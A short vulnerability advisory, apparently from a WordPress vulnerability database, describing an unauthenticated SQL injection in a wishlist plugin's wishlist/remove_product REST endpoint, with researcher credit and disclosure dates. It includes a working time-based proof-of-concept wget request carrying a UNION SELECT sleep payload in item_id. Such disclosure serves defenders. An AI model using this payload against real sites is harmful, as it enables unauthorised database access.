The plugins do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks
time wget 'https://example.com/?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(2)%20--%20g' Even though it will produce an error 400, the payload is processed and response delayed
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-31 (about 12 months ago)
2022-01-31 (about 12 months ago)
2022-04-12 (about 9 months ago)